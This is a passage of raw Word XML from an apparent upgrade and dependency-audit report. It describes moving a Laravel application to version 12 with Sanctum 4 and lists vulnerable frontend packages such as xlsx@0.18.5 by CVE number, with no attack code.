path="m9525,l628650,v2630,,4875,930,6735,2778c637245,4638,638175,6890,638175,9525r,114300c638175,126454,637245,128699,635385,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803l,123825,,9525,2790,2778c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,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29600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65993DEC" wp14:editId="42E96332">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4580632</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1047750" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28789" name="Group 28789"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1047750" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1047750" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1615" name="Shape 1615"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1047750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1047750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1040855" y="0"/>
                                  <a:pt x="1043101" y="930"/>
                                  <a:pt x="1044960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1046820" y="4651"/>
                                  <a:pt x="1047750" y="6890"/>
                                  <a:pt x="1047750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1047750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1047750" y="126448"/>
                                  <a:pt x="1046820" y="128687"/>
                                  <a:pt x="1044960" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1043101" y="132407"/>
                                  <a:pt x="1040855" y="133338"/>
                                  <a:pt x="103822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27F59C17" id="Group 28789" o:spid="_x0000_s1026" style="position:absolute;margin-left:360.7pt;margin-top:12.75pt;width:82.5pt;height:10.5pt;z-index:-251386880" coordsize="1047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z7TgMAALIJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N9psWTZiB2izXIo2&#10;aNIPoGnKEkCJAklv/foORyItyWnQJD7IJGd782a4XN8cK+7tmVSlqJd+dBX6Hqup2JT1dun/fr7/&#10;kvme0qTeEC5qtvRPTPk3q8+frg/NgsWiEHzDpAdOarU4NEu/0LpZBIGiBauIuhINq0GYC1kRDVO5&#10;DTaSHMB7xYM4DNPgIOSmkYIypWD1thX6K/Sf54zqn3mumPb40gdsGr8Sv2vzDVbXZLGVpClK2sEg&#10;70BRkbKGoM7VLdHE28nywlVVUimUyPUVFVUg8rykDHOAbKJwlM2DFLsGc9kuDtvG0QTUjnh6t1v6&#10;Y/8gm6fmUQITh2YLXODM5HLMZWX+AaV3RMpOjjJ21B6FxSiczGZTYJaCLEqSBMbIKS2A+AszWty9&#10;bhjYsMEAzKGB9lBnBtTHGHgqSMOQWLUABh6lV24AfhpNfa8mFfQpani4gsSgnqNJLRQw9kGOXKpk&#10;QXdKPzCBbJP9d6XbttzYESnsiB5rO5TQ3K+2dUO0sTMwzdA79MpVuGoZcSX27FmgojY1m09jYMJW&#10;G4CeFXjdV4zCJItHulaD7tYl/cr+DPUnYTbt+QZoGBH6KInCCIPOk66HnGgyT6HFAE88m0emvwDS&#10;0P1w5gzTLG4NJ+kUDXvx2r4Fp2k2Hwd0MmTipYA2SxfKmUQxcDLtUFq1f+DrGaWTSdZuHefSoY/i&#10;LM1mI6kjJUrC6QSl/0uLozpK4kk4duwqZPZzMgJ1rvd5t1+EtVm3mbhuGlhYnZeYgYq0PXKJAArZ&#10;VvQSOjSHFb2JENNvprkuWbbr49rY9V6hh2nY5FoCWvVeK1nx0KivPO5Ji3Hcxy7nN+0MR+Joqzne&#10;B/vB1Q9XL4pNuVCs3SLmmMHN6Y4e1D4fbrw2pxDwQQlc9jknGm/NqtTwCuBlZYowC0MbiNfgzZz9&#10;7XGLI33izJxUvP7Fcji38WYyC0pu19+49PbE3PX4Q+eENwXpVrtd2akiVPRj7POSc+cyQtOBy7vb&#10;+/g+7Tx0ysaO4TPDWYatJe3QtG8NuLEhafviAFKcEUYWtXb2NbyTMEgvWzNci80Jb2kkBC5DpAYf&#10;BphH94gxL4/+HLXOT63VXwAAAP//AwBQSwMEFAAGAAgAAAAhAEjOVK/gAAAACQEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj8Fqg0AQhu+FvsMyhd6aVRutWMcQQttTKDQphNw2OlGJOyvuRs3bd3tqjzPz&#10;8c/356tZd2KkwbaGEcJFAIK4NFXLNcL3/v0pBWGd4kp1hgnhRhZWxf1drrLKTPxF487VwoewzRRC&#10;41yfSWnLhrSyC9MT+9vZDFo5Pw61rAY1+XDdySgIEqlVy/5Do3raNFRedleN8DGpaf0cvo3by3lz&#10;O+7jz8M2JMTHh3n9CsLR7P5g+NX36lB4p5O5cmVFh/AShUuPIkRxDMIDaZr4xQlhmcQgi1z+b1D8&#10;AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAM9+rPtOAwAAsgkAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAEjOVK/gAAAACQEAAA8AAAAAAAAAAAAA&#10;AAAAqAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAC1BgAAAAA=&#10;">
                <v:shape id="Shape 1615" o:spid="_x0000_s1027" style="position:absolute;width:10477;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1047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e1wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X+h+WKfRWNxarJbqKKLaKp1gv3obsmMRmZ0N28/Dfu4LgbT6+58wWvSlFS7UrLCsYDiIQxKnV&#10;BWcKjn+bj28QziNrLC2Tgis5WMxfX2YYa9txQu3BZyKEsItRQe59FUvp0pwMuoGtiAN3trVBH2Cd&#10;SV1jF8JNKT+jaCwNFhwacqxolVP6f2iMAjfarVfLyejn0p1+T8kEm71vG6Xe3/rlFISn3j/FD/dW&#10;h/nj4RfcvwknyPkNAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAm2k3tcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l1038225,v2630,,4876,930,6735,2791c1046820,4651,1047750,6890,1047750,9525r,114300c1047750,126448,1046820,128687,1044960,130547v-1859,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126448,,123825l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1047750,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgraded to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Laravel 12.69.2</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Sanctum 4.3.3, PHP floor </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>^8.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2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PHPUnit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 11. Compatibility was checked first: no migration uses </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>change(</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(which needed Doctrine DBAL, removed in 11), the classic </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bootstrap/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD82B70" w14:textId="04A0F527" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">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30624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E8F548D" wp14:editId="2BAB6177">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4209157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1333500" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27472" name="Group 27472"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1333500" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1333500" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1649" name="Shape 1649"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1333500" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1333500" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1323975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1326606" y="0"/>
                                  <a:pt x="1328851" y="930"/>
                                  <a:pt x="1330710" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1332570" y="4638"/>
                                  <a:pt x="1333500" y="6890"/>
                                  <a:pt x="1333500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1333500" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1333500" y="135973"/>
                                  <a:pt x="1332570" y="138212"/>
                                  <a:pt x="1330710" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1328851" y="141932"/>
                                  <a:pt x="1326606" y="142863"/>
                                  <a:pt x="1323975"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094BE6D" id="Group 27472" o:spid="_x0000_s1026" style="position:absolute;margin-left:331.45pt;margin-top:0;width:105pt;height:11.25pt;z-index:-251385856" coordsize="13335,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&#10;">
                <v:shape id="Shape 1649" o:spid="_x0000_s1027" style="position:absolute;width:13335;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="13335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OSGwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LFLzVjY9GTV1FLBZvohG8DtkxCWZn4+5W03/fLRS8zcf3nMWqM424k/O1ZQXDQQKCuLC6&#10;5lLBKd++zUD4gKyxsUwKfsjDatl7WWCm7YMPdD+GUsQQ9hkqqEJoMyl9UZFBP7AtceQu1hkMEbpS&#10;aoePGG4aOUqSVBqsOTZU2NKmouJ6/DYKaLye11/j9H24c+frPp9+Tm+3XKn+a7f+ABGoC0/xv3un&#10;4/x0Moe/b+IJcvkLAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAp/DkhsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l1323975,v2631,,4876,930,6735,2778c1332570,4638,1333500,6890,1333500,9525r,123825c1333500,135973,1332570,138212,1330710,140072v-1859,1860,-4104,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1333500,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kernel.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> structure that Laravel 12 still supports for upgraded applications is retained, and no removed helper is referenced. One change was required</w:t>
      </w:r>
      <w:r>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 xml:space="preserve">Sanctum 4 no longer auto-loads its </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>personal_access_tokens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> migration</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, so it is now published into the application; without it every login fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0716AB" w14:textId="77A13FD9" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="177"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Frontend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 23 advisories</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2 critical, 14 high). Two were reachable from user input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682074AD" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="232" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FD73B1" w14:textId="6AEE15CA" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="232" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xlsx@0.18.5</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>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CVE-2023-30533 (prototype pollution in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sheet_to_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>json</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CVE-2024-22363 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ReDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>). Reachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C1169" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="322"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31648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68C6ED91" wp14:editId="3294BDA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>65782</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-196043</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2000250" cy="657225"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27473" name="Group 27473"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
